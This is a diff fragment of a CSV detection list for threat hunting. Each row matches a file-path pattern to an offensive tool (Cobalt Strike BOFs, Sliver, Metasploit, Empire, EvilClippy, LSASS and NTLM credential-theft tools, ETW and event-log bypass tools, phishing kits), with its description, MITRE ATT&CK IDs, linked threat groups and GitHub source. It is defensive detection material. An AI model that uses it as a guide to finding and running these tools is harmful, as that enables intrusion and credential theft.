+"*/EternalHushCore.dll*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*/EternalHushFramework.git*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","1","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z"
+"*/etumbot.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
+"*/etw.cna","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z"
+"*/etw.x64.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z"
+"*/etw.x86.*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z"
+"*/etw-fuck.cpp*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z"
+"*/etw-fuck.exe*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z"
+"*/ETWHash/*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z"
+"*/evasion/evasion.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*/evasion/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/evasion_linux.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*/evasion_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - 
T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*/EventViewerUAC/*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z"
+"*/EventViewerUAC/*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","130","29","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z"
+"*/EventViewer-UACBypass*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z"
+"*/evil.cpp*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z"
+"*/evil.dll*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z"
+"*/evil_pdf/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/EvilClippy*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*/evilclippy.cs*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z"
+"*/EvilClippy.git*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - 
T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z"
+"*/evilginx*","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1308","237","2023-10-04T15:18:07Z","2022-09-07T02:47:43Z"
+"*/evilhost:*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/EvilLsassTwin/*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z"
+"*/EvilnoVNC.git*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z"
+"*/evilqr.git*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z"
+"*/evilSignatures.db*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z"
+"*/EvilTwinServer*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z"
+"*/EvtMute.git*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*/Example_C2_Profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/Example_Payload_Type/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*/ExcelDocWriter.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z"
+"*/exchanger.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*/exe_to_dll.git*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*/exe_to_dll.git*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z"
+"*/exe2powershell*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z"
+"*/exec_bin.c*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/exec_dll.c*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/exec_psexec*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*/exec_psh.c*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/exec_wmi*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*/exec0.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*/Executable_Files.git*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*/exegol.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/exegol_user_sources.list*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/exegol-docker-build/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/Exegol-history/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/Exegol-images-*.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/Exegol-images.git*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
